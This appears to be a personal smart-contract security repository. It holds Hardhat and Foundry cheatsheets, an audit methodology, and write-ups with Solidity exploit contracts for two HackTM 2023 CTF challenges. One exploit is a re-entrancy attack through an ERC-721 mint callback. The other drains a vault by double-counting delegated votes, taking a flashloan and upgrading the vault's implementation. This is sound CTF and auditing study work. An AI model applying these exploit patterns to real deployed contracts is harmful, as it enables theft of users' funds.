├── .gitignore
├── ctf
    └── hacktm-2023
    │   ├── README.md
    │   ├── diamond-heist
    │       ├── diamond_heist_contracts.zip
    │       ├── Exploit.sol
    │       └── README.md
    │   └── dragon-slayer
    │       ├── dragon_slayer_contracts.zip
    │       ├── Exploit.sol
    │       └── README.md
├── README.md
└── notes
    ├── hardhat.md
    ├── audit-methodology.md
    └── foundry.md


/.gitignore:
--------------------------------------------------------------------------------
1 | node_modules/
2 | artifacts/
3 | cache/


--------------------------------------------------------------------------------
/ctf/hacktm-2023/README.md:
--------------------------------------------------------------------------------
1 | # HackTM Quals 2023
2 | This CTF had two smart contract challenges:
3 | * [Dragon Slayer](dragon-slayer/)
4 | * [Diamond Heist](diamond-heist/)


--------------------------------------------------------------------------------
/ctf/hacktm-2023/diamond-heist/diamond_heist_contracts.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MiloTruck/smart-contract/HEAD/ctf/hacktm-2023/diamond-heist/diamond_heist_contracts.zip


--------------------------------------------------------------------------------
/ctf/hacktm-2023/dragon-slayer/dragon_slayer_contracts.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MiloTruck/smart-contract/HEAD/ctf/hacktm-2023/dragon-slayer/dragon_slayer_contracts.zip


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Smart Contracts
 2 | This repository contains everything related to smart contracts.
 3 | 
 4 | ## Notes
 5 | 
 6 | [Smart Contract Audit Methodology](notes/audit-methodology.md)
 7 | 
 8 | ### Cheatsheets
 9 | 
10 | * [Hardhat](/notes/hardhat.md)
11 | * [Foundry](notes/foundry.md)
12 | 
13 | ## CTFs
14 | * [HackTM CTF Quals 2023](/ctf/hacktm-2023/)


--------------------------------------------------------------------------------
/notes/hardhat.md:
--------------------------------------------------------------------------------
 1 | # Hardhat
 2 | 
 3 | ## Creating a new Hardhat project
 4 | 
 5 | In the project directory, run:
 6 | ```shell
 7 | npm init --yes
 8 | npm install --save-dev hardhat
 9 | npx hardhat
10 | ```
11 | 
12 | ## Running tests
13 | ```shell
14 | # Run test locally
15 | npx hardhat test path/to/test.js
16 | 
17 | # Run test on testnet
18 | npx hardhat test path/to/test.js --network ropsten
19 | ```


--------------------------------------------------------------------------------
/ctf/hacktm-2023/dragon-slayer/Exploit.sol:
--------------------------------------------------------------------------------
 1 | // SPDX-License-Identifier: UNLICENSED
 2 | pragma solidity ^0.8.13;
 3 | 
 4 | import "./dragon_slayer_contracts/Setup.sol";
 5 | import "./dragon_slayer_contracts/Knight.sol";
 6 | import "./dragon_slayer_contracts/Dragon.sol";
 7 | import "./dragon_slayer_contracts/Bank.sol";
 8 | import "./dragon_slayer_contracts/GoldCoin.sol";
 9 | 
10 | contract Exploit {
11 |     // Challenge contracts
12 |     Setup public setup;
13 |     Knight public knight;
14 |     Dragon public dragon;
15 |     Bank public bank;
16 |     GoldCoin public goldCoin;
17 | 
18 |     // Counts the number of times onERC721Received is called
19 |     uint256 hitCount;
20 | 
21 |     // Amount of gold coins required to solve the challenge
22 |     uint256 constant goldCoinAmount = 2_000_000 ether;
23 | 
24 |     constructor(Setup _setup) {
25 |         // Initialize challenge contracts
26 |         setup = _setup;
27 |         knight = setup.knight();
28 |         dragon = knight.dragon();
29 |         bank = knight.bank();
30 |         goldCoin = bank.goldCoin();
31 | 
32 |         // Claim ownership of Knight contract
33 |         setup.claim();
34 |     }
35 | 
36 |     function exploit() public {
37 |         // Get an empty banknote (id 1)
38 |         uint[] memory bankNoteIDsFrom = new uint[](0);
39 |         bank.merge(bankNoteIDsFrom);
40 | 
41 |         // Abuse bank.split() to "borrow" 2,000,000 ether
42 |         uint[] memory amounts = new uint[](2);
43 |         amounts[0] = goldCoinAmount;
44 |         bank.split(1, amounts);
45 |     }
46 | 
47 |     function onERC721Received(address, address, uint256, bytes calldata) public returns (bytes4) {
48 |         // Only perform the exploit on the third onERC721Received call
49 |         if (hitCount == 2) {
50 |             // Withdraw all gold coins from banknote (id 2)
51 |             bank.withdraw(2);
52 | 
53 |             // Transfer all coins to Knight
54 |             goldCoin.transfer(address(knight), goldCoinAmount);
55 |             
56 |             // Buy items 3 and 4
57 |             knight.buyItem(3);
58 |             knight.buyItem(4);
59 | 
60 |             // Fight Dragon until its health is 0
61 |             while (dragon.health() > 0) {
62 |                 knight.fightDragon();
63 |             }
64 | 
65 |             // Sell items 3 and 4
66 |             knight.sellItem(3);
67 |             knight.sellItem(4);
68 | 
69 |             // Deposit gold coins into a new banknote (id 4)
70 |             knight.bankDeposit(goldCoinAmount);
71 | 
72 |             // Transfer all gold coins back to this contract's banknote (id 1)
73 |             knight.bankTransferPartial(4, goldCoinAmount, 1);
74 |         }
75 |         
76 |         // Increment the counter by 1
77 |         hitCount += 1;
78 | 
79 |         return this.onERC721Received.selector;
80 |     }
81 | 
82 | }


--------------------------------------------------------------------------------
/ctf/hacktm-2023/diamond-heist/Exploit.sol:
--------------------------------------------------------------------------------
  1 | // SPDX-License-Identifier: UNLICENSED
  2 | pragma solidity ^0.8.13;
  3 | 
  4 | import "./diamond_heist_contracts/Setup.sol";
  5 | import "./diamond_heist_contracts/Vault.sol";
  6 | import "./diamond_heist_contracts/Diamond.sol";
  7 | import "./diamond_heist_contracts/SaltyPretzel.sol";
  8 | 
  9 | contract Exploit {
 10 |     // Challenge contracts
 11 |     Setup public setup;
 12 |     Vault public vault;
 13 |     SaltyPretzel public saltyPretzel;
 14 | 
 15 |     constructor(Setup _setup) {
 16 |         // Initialize challenge contracts
 17 |         setup = _setup;
 18 |         vault = setup.vault();
 19 |         saltyPretzel = setup.saltyPretzel();
 20 | 
 21 |         // Claim initial SaltyPretzel tokens
 22 |         setup.claim();
 23 |     }
 24 | 
 25 |     function exploit() public {
 26 |         // Create a contract contract to hoard votes
 27 |         VoteCollector voteCollector = new VoteCollector(setup);
 28 | 
 29 |         // Loop while VoteCollector has not enough votes
 30 |         while (saltyPretzel.getCurrentVotes(address(voteCollector)) < vault.AUTHORITY_THRESHOLD()) {
 31 |             // Add our votes to VoteCollector 
 32 |             saltyPretzel.delegate(address(voteCollector));
 33 | 
 34 |             // Set our delegatee to address(0)
 35 |             saltyPretzel.transfer(address(voteCollector), setup.SALTY_PRETZELS());
 36 |             saltyPretzel.delegate(address(0));
 37 | 
 38 |             // Regain our SaltyPretzel tokens
 39 |             saltyPretzel.transferFrom(address(voteCollector), address(this), setup.SALTY_PRETZELS());
 40 |         }
 41 | 
 42 |         // When VoteCollector has enough votes, steal the vault's diamonds
 43 |         voteCollector.stealDiamonds();
 44 |     }
 45 | }
 46 | 
 47 | contract VoteCollector {
 48 |     // Challenge contracts
 49 |     Setup public setup;
 50 |     Vault public vault;
 51 |     Diamond public diamond;
 52 |     SaltyPretzel public saltyPretzel;
 53 | 
 54 |     constructor(Setup _setup) {
 55 |         // Initialize challenge contracts
 56 |         setup = _setup;
 57 |         vault = setup.vault();
 58 |         diamond = setup.diamond();
 59 |         saltyPretzel = setup.saltyPretzel();
 60 | 
 61 |         // Allow the Exploit contract to transfer all of this contract's SaltyPretzel tokens
 62 |         saltyPretzel.approve(msg.sender, type(uint256).max);
 63 |     }
 64 | 
 65 |     function stealDiamonds() public {
 66 |         // Borrow a flashloan to temporarily set the vault's diamond balance to 0
 67 |         vault.flashloan(address(diamond), setup.DIAMONDS(), address(this));
 68 | 
 69 |         // After the vault is upgraded to FakeVault, transfer its diamonds to Setup
 70 |         FakeVault(address(vault)).transferDiamonds(address(setup));
 71 |     }
 72 | 
 73 |     function onFlashLoan(
 74 |         address,
 75 |         address,
 76 |         uint256,
 77 |         uint256,
 78 |         bytes calldata
 79 |     ) external returns(bytes32) {
 80 |         // Create a FakeVault contract
 81 |         FakeVault fakeVault = new FakeVault();
 82 | 
 83 |         // Upgrade the implementation of vault to FakeVault
 84 |         bytes memory data = abi.encodeWithSelector(vault.upgradeTo.selector, address(fakeVault));
 85 |         vault.governanceCall(data);
 86 | 
 87 |         // Return the borrowed diamonds to vault
 88 |         diamond.transfer(address(vault), setup.DIAMONDS());
 89 | 
 90 |         return keccak256("ERC3156FlashBorrower.onFlashLoan");
 91 |     }
 92 | }
 93 | 
 94 | contract FakeVault is Initializable, UUPSUpgradeable, OwnableUpgradeable {    
 95 |     // Keep the diamond state variable
 96 |     Diamond diamond;
 97 | 
 98 |     // Function to transfer all of the vault's diamonds
 99 |     function transferDiamonds(address to) public {
100 |         diamond.transfer(to, diamond.balanceOf(address(this)));
101 |     }
102 |     
103 |     // _authorizeUpgrade has to be implemented for UUPSUpgradeable contracts
104 |     function _authorizeUpgrade(address) internal override view {}
105 | }


--------------------------------------------------------------------------------
/notes/audit-methodology.md:
--------------------------------------------------------------------------------
  1 | # Smart Contract Audit Methodology
  2 | 
  3 | ## Picking a target
  4 | * [Strategies for picking bounty hunting targets](https://www.joranhonig.nl/4-bug-hunting-target-strategies/)
  5 | 
  6 | ## Before the audit
  7 | 
  8 | ### Reading the protocol's documentation
  9 | 
 10 | Gain an understanding of how the system works:
 11 | * What components exist in the system and how are they meant to function?
 12 |   * List down high-level functionality of what each contract aims to do.
 13 | * How many different actors are there and what are their roles?
 14 |   * List down what each role should be able to do and how they interact with the contract.
 15 | * Do the mechanics make sense? Or is the system design flawed regardless of the implementation?
 16 | 
 17 | Identify areas of interest:
 18 |   * Which components of the system handle assets?
 19 |   * Which components would have the most significant impact on the system if it had a bug?
 20 |   * If you would re-build the system, where would you spend the most time?
 21 | 
 22 | List potential pain points and possible attack vectors.
 23 | 
 24 | ### Research similar protocols
 25 | 
 26 | Look for protocols that have similar functionality and do the following:
 27 | * Learn how they are designed and implemented. 
 28 | * Read previous audits reports or post-mortems and look out for common vulnerabilities for such protocols.
 29 | 
 30 | ## Beginning the audit
 31 | 
 32 | To begin auditing the repository:
 33 | * Look through `README.md`.
 34 | * Scan the `.sol` files for block comments that explain technical designs/gotchas.
 35 | * Examine the test suite:
 36 |   * Run the tests and take note of the coverage - are there any contracts that are not tested?
 37 |   * Are there tests that look insufficient? (eg. Might not cover an edge case)
 38 | 
 39 | ## Code Review
 40 | 
 41 | ### Build a mental model
 42 | 
 43 | With the list of each contract's functionality and what different users should be able to do, walk through each of their the code paths and find out how the code implements these objectives. This is done to gain a high-level understanding of the contracts before focusing on details.
 44 | 
 45 | > **DO NOT** go through the code line-by-line, just have an idea of what each function accomplishes and the overall call path.
 46 | 
 47 | Note down things that seem off or confusing with an `@audit` tag and come back to it later.
 48 | 
 49 | ### Looking for vulnerabilities
 50 | 
 51 | #### Resolving `@audit` tags
 52 | 
 53 | Go through the `@audit` tags were made earlier and resolve them, while doing the following:
 54 | * Examine the code path for edge cases
 55 | * Look out for possible bugs and mistakes in the code
 56 | * See if any common attack vectors in such protocols and are applicable 
 57 | 
 58 | > **DO NOT** get side-tracked other potential attacks or bugs, mark them with another `@audit` tag and come back to them later after resolving the current one.
 59 | 
 60 | #### Ideating Attack Vectors
 61 | After resolving all the initial `@audit` tags, it's time to come up with potential attack vectors:
 62 | * Run a static analyzer, such as [Slither](https://github.com/crytic/slither), and mark all interesting results with an `@audit` tag.
 63 | * Identify all primitives an attacker has in each contract, such as:
 64 |    * What public/external functions are there in the contract?
 65 |    * How can an attacker modify the contract's state?
 66 |    * Can sending Ether or other tokens to the contract change its behavior?
 67 |  * Think of invariants that should hold for each contract, and how they can be broken.
 68 | 
 69 | Consider attack vectors that are not immediately obvious:
 70 |  * Use of non-compliant tokens (Fee-on-transfer tokens, ERC777, USDT)
 71 |  * Front-runnning
 72 |  * Gas griefing
 73 | 
 74 | Mark all potential attack vectors with an `@audit` tag in the code and resolve them.
 75 | 
 76 | #### Line-by-line Review
 77 | 
 78 | Do a deep review of every file - read through them line by line and focus on the implementation of each function. Go through [Smart Contract Auditing Heuristics](https://github.com/OpenCoreCH/smart-contract-auditing-heuristics) and see if any of them applies.
 79 | 
 80 | ## Dynamic Testing
 81 | 
 82 | ### Tests
 83 | 
 84 | If the test coverage is poor, write tests to fill in the missing coverage. Look for odd behavior that does not match your understanding of the contract and mark it with an `@audit` tag.
 85 | 
 86 | ### PoCs
 87 | 
 88 | Write a PoC for all findings and check if they are actually valid. If the system functions differently from your understanding and an attack is not viable, examine how it can be tweaked using the primitives an attacker has.
 89 | 
 90 | ### Invariant Testing
 91 | 
 92 | Using methods such as formal verification and fuzzing, ensure that the invariants identified for each contract holds.
 93 | 
 94 | ## Wrapping up the audit
 95 | Review all `@audit` tags and ensure they are all resolved.
 96 | 
 97 | Go through each finding and do the following:
 98 | * Ensure it is valid.
 99 | * Include the relevant details: file, line numbers, code blocks, description, criticality, PoCs.
100 | * Think of how each finding can be mitigated.
101 | 
102 | Finally, compile all findings into a report.
103 | 
104 | ## References
105 | 
106 | * [Guardian Audit's Methodology](https://lab.guardianaudits.com/the-auditors-handbook/the-auditing-process)
107 | * [Joran Honig's Methodology](https://twitter.com/joranhonig/status/1539578735631949825)
108 | * [Zach Obront's Methodology](https://twitter.com/zachobront/status/1606132664422891520)
109 | * [Solcurity Standard](https://github.com/transmissions11/solcurity)
110 | * [Smart Contract Auditing Heuristics](https://github.com/OpenCoreCH/smart-contract-auditing-heuristics)
111 | 


--------------------------------------------------------------------------------
/notes/foundry.md:
--------------------------------------------------------------------------------
  1 | # Foundry Cheatsheet
  2 | 
  3 | - [Foundry Cheatsheet](#foundry-cheatsheet)
  4 |   - [Setup](#setup)
  5 |   - [Dependencies](#dependencies)
  6 |     - [Adding dependencies](#adding-dependencies)
  7 |     - [Remappings](#remappings)
  8 |   - [Testing](#testing)
  9 |     - [Fork testing](#fork-testing)
 10 |     - [Useful Cheatcodes](#useful-cheatcodes)
 11 |       - [Global values](#global-values)
 12 |       - [Storage and memory](#storage-and-memory)
 13 |       - [Caller address](#caller-address)
 14 |       - [Balances](#balances)
 15 |       - [Testing reverts](#testing-reverts)
 16 |       - [Others](#others)
 17 |     - [Fuzzing](#fuzzing)
 18 | 
 19 | ## Setup
 20 | Create a new project:
 21 | ```sh
 22 | forge init <project_name>
 23 | ```
 24 | 
 25 | Create a new project using a template:
 26 | ```sh
 27 | forge init --template <template> <project_name>
 28 | 
 29 | # Example
 30 | forge init --template https://github.com/zobront/paradigm-ctf paradigm_ctf
 31 | ```
 32 | 
 33 | ## Dependencies
 34 | 
 35 | ### Adding dependencies
 36 | 
 37 | Install dependencies in an existing project:
 38 | ```sh
 39 | forge install
 40 | ```
 41 | 
 42 | To add a new dependency:
 43 | ```sh
 44 | forge install <dependency>
 45 | 
 46 | # Example
 47 | forge install openzeppelin/openzeppelin-contracts
 48 | ```
 49 | 
 50 | ### Remappings
 51 | 
 52 | Forge can automatically deduce remappings:
 53 | ```sh
 54 | forge remappings > remappings.txt
 55 | ```
 56 | 
 57 | To customize a remapping, simply add it to `remappings.txt`:
 58 | ```sh
 59 | echo "@openzeppelin/=lib/openzeppelin-contracts/" > remappings.txt
 60 | ```
 61 | 
 62 | ## Testing
 63 | 
 64 | To run tests:
 65 | ```sh
 66 | forge test
 67 | ```
 68 | 
 69 | Verbosity
 70 | - `-vv` shows `console.log` output.
 71 | - `-vvv` shows execution traces for failing tests. 
 72 | - `-vvvv` shows execution traces for all tests, and setup traces for failing tests.
 73 | - `-vvvvv` shows execution and setup traces for all tests.
 74 | 
 75 | To run specific tests:
 76 | - `--match-test` runs tests matching the specified regex.
 77 | - `--match-contract` runs tests in contracts matching the specified regex.
 78 | - `--match-path` runs tests in source files matching the specified path.
 79 | 
 80 | ### Fork testing
 81 | 
 82 | To fork a network:
 83 | ```sh
 84 | forge test --fork-url <rpc_url>
 85 | ```
 86 | 
 87 | To identify contracts in a forked environment, pass your Etherscan API key using `--etherscan-api-key`:
 88 | ```sh
 89 | forge test --fork-url <rpc_url> --etherscan-api-key <etherscan_api_key>
 90 | ```
 91 | 
 92 | ### Useful Cheatcodes
 93 | 
 94 | Refer to [Cheatcodes Reference](https://book.getfoundry.sh/cheatcodes/) for all available cheatcodes.
 95 | 
 96 | #### Global values
 97 | 
 98 | ```solidity
 99 | // Set block.timestamp
100 | vm.warp(uint256 timestamp)
101 | 
102 | // Increase block.timestamp by specified seconds
103 | skip(uint256 time)
104 | 
105 | // Decrease block.timestamp by specified seconds
106 | rewind(uint256 time) 
107 | 
108 | // Set block.number
109 | vm.roll(uint256 blockNumber)
110 | ```
111 | 
112 | #### Storage and memory
113 | 
114 | ```solidity
115 | // Load a storage slot from an address
116 | vm.load(address account, bytes32 slot) 
117 | 
118 | // Store a value to an address' storage slot
119 | vm.store(address account, bytes32 slot)
120 | 
121 | // Set code at address
122 | vm.etch(address addr, bytes calldata code)
123 | ```
124 | 
125 | #### Caller address
126 | 
127 | ```solidity
128 | // Set msg.sender for the next call
129 | vm.prank(address msgSender)` 
130 | 
131 | // Set msg.sender for subsequent calls
132 | vm.startPrank(address msgSender)
133 | 
134 | // Reset msg.sender for subsequent calls
135 | vm.stopPrank()
136 | 
137 | // Change msg.sender for subsequent calls
138 | changePrank(address msgSender) 
139 | ```
140 | 
141 | #### Balances
142 | 
143 | ```solidity
144 | // Set ether balance for an address
145 | deal(address to, uint256 balance)
146 | 
147 | // Set ERC20 token balance for an address
148 | deal(address token, address to, uint256 balance)
149 | 
150 | // Set ERC20 token balance for an address and increase totalSupply if `adjust` is true
151 | deal(address token, address to, uint256 balance, bool adjust)
152 | 
153 | // Give ERC721 token with `id` to an address
154 | dealERC721(address token, address to, uint256 id)
155 | 
156 | // Set ERC1155 token balance for an address
157 | dealERC1155(address token, address to, uint256 id, uint256 balance)
158 | 
159 | // Set ERC1155 token balance for an address and adjust totalSupply
160 | dealERC1155(address token, address to, uint256 id, uint256 balance, bool adjust)
161 | ```
162 | 
163 | #### Testing reverts
164 | 
165 | ```solidity
166 | // Expect the next call to revert
167 | vm.expectRevert()
168 | 
169 | // Expect the next call to revert with `message`
170 | vm.expectRevert(bytes calldata message)
171 | 
172 | // Expect the next call to revert with `bytes4 data` (used for custom error selectors)
173 | vm.expectRevert(bytes4 data)
174 | ```
175 | 
176 | #### Others
177 | 
178 | ```solidity
179 | // Create a labelled address
180 | address addr = makeAddr(string memory name)
181 | 
182 | // Create a labelled address with private key
183 | (address addr, uint256 privateKey) = makeAddrAndKey(string memory name)
184 | 
185 | // Sign data
186 | (uint8 v, bytes32 r, bytes32 s) = vm.sign(uint256 privateKey, bytes32 digest)
187 | ```
188 | 
189 | ### Fuzzing
190 | 
191 | Use `vm.assume()` to specify conditions for inputs. It should only be used for narrow checks:
192 | ```solidity
193 | function testSomething(uint256 v) public {
194 |     vm.assume(v != 0);
195 |     require(v != 0);
196 |     ... 
197 | }
198 | ```
199 | 
200 | Use `bound()` to restrict inputs to a certain range:
201 | ```solidity
202 | function testSomething(uint256 v) public {
203 |     v = bound(v, 100, 500);
204 |     require(v >= 100 && v <= 500);
205 |     ... 
206 | }
207 | ```
208 | 


--------------------------------------------------------------------------------
/ctf/hacktm-2023/dragon-slayer/README.md:
--------------------------------------------------------------------------------
  1 | # Dragon Slayer
  2 | 
  3 | > Prove yourself a true champion. Kill the mighty dragon and earn the right to call yourself a dragon slayer.
  4 | >
  5 | > `nc 34.141.16.87 30100`
  6 | 
  7 | The contracts for this challenge can be found in [`dragon_slayer_contracts.zip`](dragon_slayer_contracts.zip).
  8 | 
  9 | ## Overview
 10 | 
 11 | We are provided with the following contracts:
 12 | * `Setup.sol`: The contract used to setup the challenge and check if the challenge is solved.
 13 | * `Item.sol`: An ERC-1155 contract that implements items equippable by our knight.
 14 | * `GoldCoin.sol`: An ERC-20 contract that implements ERC-20 tokens, known as gold coins, which are used as fungible currency.
 15 | * `BankNote.sol`: An ERC-721 contract that implements ERC-721 tokens, known as bank notes.
 16 | 
 17 | `Shop.sol` implements a contract to buy and sell items in exchange for gold coins. It sells the following items:
 18 | 
 19 | | `itemId` | `itemType`        | `attack`  | `defence` | `price`           |
 20 | | -------- | ----------------- | --------- | --------- | ----------------- |
 21 | | 1        | `ItemType.SWORD`  | 1         | 0         | `10 ether`        |
 22 | | 2        | `ItemType.SHIELD` | 0         | 1         | `10 ether`        |
 23 | | 3        | `ItemType.SWORD`  | 1,000,000 | 0         | `1_000_000 ether` |
 24 | | 4        | `ItemType.SHIELD` | 0         | 1,000,000 | `1_000_000 ether` |
 25 | 
 26 | `Dragon.sol` implements a contract that represents the enemy character, which has the following attributes:
 27 | * `health`: 1,000,000
 28 | * `clawAttack` and `fireAttack`: 1,000,000
 29 | * `defense`: 500,000 
 30 | 
 31 | `Knight.sol` implements a contract that represents our player, which also has its own `health`, `attack` and `defence` attributes. The relevant functions in the contract are:
 32 | * `fightDragon()`: Fights the dragon - receive an attack from the dragon and then attack it.
 33 | * `buyItem()`, `sellItem()`: Buy and sell items from the shop. Items that are bought are equipped, which changes the `attack` and `defence` attributes of the knight.
 34 | * `bankDeposit()`, `bankTransferPartial()`: Functions for the knight to interact with the `Bank` contract. Note that there are also other functions not listed here that interact with the `Bank` contract.
 35 | 
 36 | `Bank.sol` implements a `Bank` contract, which facillitates the exchange of gold coins for a non-fungible bank note. It has the following relevant functions:
 37 |   * `deposit()`: Deposit an amount of gold coins for a bank note.
 38 |   * `withdraw()`: Burn a bank note to withdraw its amount of gold coins.
 39 |   * `merge()`: Merge multiple bank notes into a new bank note.
 40 |   * `split()`: Split a single bank note into multiple new bank notes.
 41 |   * `transferPartial()`: Transfer an amount of gold coins from one bank note to another.
 42 | 
 43 | At the start of the challenge, the knight has only `10 ether` gold coins. The knight is also equipped with items `1` and `2`, thus he only has 1 `attack` and 1 `defense`.
 44 | 
 45 | Through the `Setup` contract, we are able to claim ownership of the knight:
 46 | ```solidity
 47 | function claim() external {
 48 |     require(!claimed, "ALREADY_CLAIMED");
 49 |     claimed = true;
 50 |     knight.transferOwnership(msg.sender);
 51 | }
 52 | ```
 53 | 
 54 | To solve the challenge, we have to reduce the dragon's health to 0 while our knight still has health:
 55 | ```solidity
 56 | function isSolved() external view returns (bool) {
 57 |     return knight.health() > 0 && knight.dragon().health() == 0;
 58 | }
 59 | ```
 60 | 
 61 | Essentially, we have to fight the dragon with our knight and defeat it. However, due to the dragon's high health, attack and defense attributes, the knight has to purchase and equip items `3` and `4` before fighting the dragon.
 62 | 
 63 | However, items `3` and `4` cost a total of `2_000_000 ether` gold coins, which is way more than what we have initially. If only there was a way to create gold coins out of thin air...
 64 | 
 65 | ## The vulnerability
 66 | 
 67 | In the `BankNote` contract, the `mint()` function uses `_safeMint()`:
 68 | ```solidity
 69 | function mint(address to, uint256 tokenId) public onlyOwner {
 70 |         _safeMint(to, tokenId);
 71 | }
 72 | ```
 73 | 
 74 | `safeMint()` checks if the receiving address is capable of receiving ERC-721 tokens before minting the token. According to [OpenZeppelin's documentation](https://docs.openzeppelin.com/contracts/4.x/api/token/erc721#ERC721-_safeMint-address-uint256-):
 75 | > If `to` refers to a smart contract, it must implement `IERC721Receiver.onERC721Received`, which is called upon a safe transfer.
 76 | 
 77 | This means that if the receiving address is a smart contract, it has to implement an `onERC721Received()` function, which is expected to return `this.onERC721Received.selector`. 
 78 | 
 79 | In [OpenZeppelin's ERC-721 implementation](https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/token/ERC721/ERC721.sol), whenever a token is minted to a contract, `_safeMint()` calls `_checkOnERC721Received()`, which invokes the `onERC721Received()` function of the receiving contract. As such, when `mint()` is called in the `BankNote` contract, execution flow is passed to the receiving contract temporarily before the bank note is minted.
 80 | 
 81 | With this knowledge, we can spot a vulnerability in the `split()` function in `Bank.sol`:
 82 | ```solidity
 83 | function split(uint bankNoteIdFrom, uint[] memory amounts) external {
 84 |     uint totalValue;
 85 |     require(bankNote.ownerOf(bankNoteIdFrom) == msg.sender, "NOT_OWNER");
 86 | 
 87 |     for (uint i = 0; i < amounts.length; i++) {
 88 |         uint value = amounts[i];
 89 | 
 90 |         _ids.increment();
 91 |         uint bankNoteId = _ids.current();
 92 | 
 93 |         bankNote.mint(msg.sender, bankNoteId);
 94 |         bankNoteValues[bankNoteId] = value;
 95 |         totalValue += value;
 96 |     }
 97 | 
 98 |     require(totalValue == bankNoteValues[bankNoteIdFrom], "NOT_ENOUGH");
 99 |     bankNote.burn(bankNoteIdFrom);
100 |     bankNoteValues[bankNoteIdFrom] = 0;
101 | }
102 | ```
103 | 
104 | Notice the following: 
105 | * If `msg.sender` is a contract, `bankNote.mint(msg.sender, bankNoteId)` allows `msg.sender` to hijack execution flow temporarily through its `onERC721Received()` function.
106 | * The function mints all resulting bank notes with their values from `amounts` before checking that the value of `bankNoteIdFrom` is equal to the sum of `amounts`, as seen in the `require` statement.
107 | 
108 | As the function performs minting before the check, it violates the [Checks-Effects-Interactions pattern](https://docs.soliditylang.org/en/v0.8.19/security-considerations.html#re-entrancy), making it vulnerable to re-entrancy. This can be exploited to temporarily own any amount of gold coins:
109 | 1. An attacker contract calls `split()` with the following arguments:
110 |    *  `bankNoteIdFrom` - a bank note with no value owned by the attacker. We'll call this *bankNoteA*.
111 |    *  `amount` - `[x, 0]`, where `x` can be any arbitrary amount of gold coins the attacker needs.
112 | 2. In the first iteration of the for-loop in `split()`:
113 |    * When `bankNote.mint()` is called, the attacker does nothing in the `onERC721Received()` callback.
114 |    * A new bank note is minted to the attacker and assigned the value `x`. We'll call this *bankNoteB*.
115 | 3. By the second iteration, the attacker owns *bankNoteB*, which has a value of `goldCoinAmount`. 
116 | Thus, when `bankNote.mint()` is called again, the attacker does the following in the `onERC721Received()` callback:
117 |    * Withdraws *bankNoteB* in exchange for `x` amount of gold coins and does whatever he wants with them.
118 |    * Before `onERC721Received()` returns, the attacker has to deposit `x` amount of gold coins and transfer them to *bankNoteA*. 
119 | 1. When the for-loop terminates, the check at the end of `split()` passes as both `totalValue` and `bankNoteValues[bankNoteIDFrom]` equal to `x`.
120 | 
121 | For those who are familiar with smart contracts, this looks very similar to a [flash loan](https://docs.aave.com/faq/flash-loans). We can borrow any arbitrary amount of gold coins provided that we return them at the end of the function.
122 | 
123 | ## Solving the challenge
124 | With the vulnerability above, solving the challenge becomes trivial. We create an attacker contract which does the following:
125 | 1. **Obtain a bank note:** As our attacker contract has no gold coins, it cannot call `deposit()`. Instead, we call `merge()` with an empty array:
126 | ```solidity
127 | // Get an empty banknote (id 1)
128 | uint[] memory bankNoteIDsFrom = new uint[](0);
129 | bank.merge(bankNoteIDsFrom);
130 | ```
131 | 
132 | 2. **Exploit the vulnerability:** We then call `split()` with our empty bank note and `amount = [2_000_000 ether, 0]` to gain `2_000_000 ether` worth of gold coins:
133 | ```solidity
134 | // Abuse bank.split() to "borrow" 2,000,000 ether
135 | uint[] memory amounts = new uint[](2);
136 | amounts[0] = goldCoinAmount;
137 | bank.split(1, amounts);
138 | ```
139 | 1. **Fight the dragon:** In the second callback to `onERC721Received()`, we do the following:
140 |    1. Withdraw our `2_000_000 ether` gold coins from the bank note.
141 |    2. Transfer all gold coins to the knight.
142 |    3. Knight buys items `3` and `4` with all the gold coins.
143 |    4. Knight fights the dragon until its health is 0.
144 |    5. Knight sells items `3` and `4` to gain back the `2_000_000 ether` gold coins. 
145 |    6. Knight deposits the gold coins and transfers it to the attacker contract's bank note. 
146 | 
147 | ## Exploit code
148 | The exploit contract, which implements the steps above, can be found in [`Exploit.sol`](Exploit.sol).


--------------------------------------------------------------------------------
/ctf/hacktm-2023/diamond-heist/README.md:
--------------------------------------------------------------------------------
  1 | # Diamond Heist
  2 | 
  3 | > Salty Pretzel Swap DAO has recently come out with their new flashloan vaults. They have deposited all of their 100 Diamonds in one of their vaults.
  4 | > 
  5 | > Your mission, should you choose to accept it, is to break the vault and steal all of the diamonds. This would be one of the greatest heists of all time.
  6 | > 
  7 | > This text will self-destruct in ten seconds.
  8 | > 
  9 | > Good luck.
 10 | >
 11 | > `nc 34.141.16.87 30200`
 12 | 
 13 | The contracts for this challenge can be found in [`diamond_heist_contracts.zip`](diamond_heist_contracts.zip).
 14 | 
 15 | ## Overview
 16 | 
 17 | We are provided with the following contracts:
 18 | * `Setup.sol`: The contract used to setup the challenge and check if the challenge is solved.
 19 | * `Diamond.sol`: An ERC-20 contract that implements ERC-20 tokens known as diamonds.
 20 | * `Burner.sol`: A contract which contains a `selfdestruct` call to itself. (This contract is not important)
 21 | 
 22 | `SaltyPretzel.sol` is an ERC-20 contract that implements a governance token contract. Essentially, owning more SaltyPretzel tokens would give a user more votes, which is useful in a system that implements [governance](https://ethereum.org/en/governance/). This contract will be explained more in-depth later on.
 23 | 
 24 | `Vault.sol` implements a `Vault` contract that is used to store diamonds. It is meant to be an proxy implementation contract as it follows the [UUPSUpgradeable](https://docs.openzeppelin.com/contracts/4.x/api/proxy#UUPSUpgradeable) pattern. It has the following interesting functions:
 25 | * `governanceCall()`: Allows the vault's owner or anyone with sufficient votes to execute any of this contract's functions.
 26 | * `flashloan()`: A function to take out a [flash loan](https://docs.aave.com/faq/flash-loans) of any token.
 27 | 
 28 | `VaultFactory.sol` contains a contract that deploys `Vault` as an [`ERC1967Proxy`](https://docs.openzeppelin.com/contracts/4.x/api/proxy#ERC1967Proxy).
 29 | 
 30 | At the start of the challenge, 100 diamonds are transferred to the vault after it is initialized, as seen in `Setup.sol`:
 31 | ```solidity
 32 | uint constant public DIAMONDS = 100;
 33 | 
 34 | // ...
 35 | 
 36 | constructor () {
 37 |     vaultFactory = new VaultFactory();
 38 |     vault = vaultFactory.createVault(keccak256("The tea in Nepal is very hot."));
 39 |     diamond = new Diamond(DIAMONDS);
 40 |     saltyPretzel = new SaltyPretzel();
 41 |     vault.initialize(address(diamond), address(saltyPretzel));
 42 |     diamond.transfer(address(vault), DIAMONDS);
 43 | }
 44 | ```
 45 | 
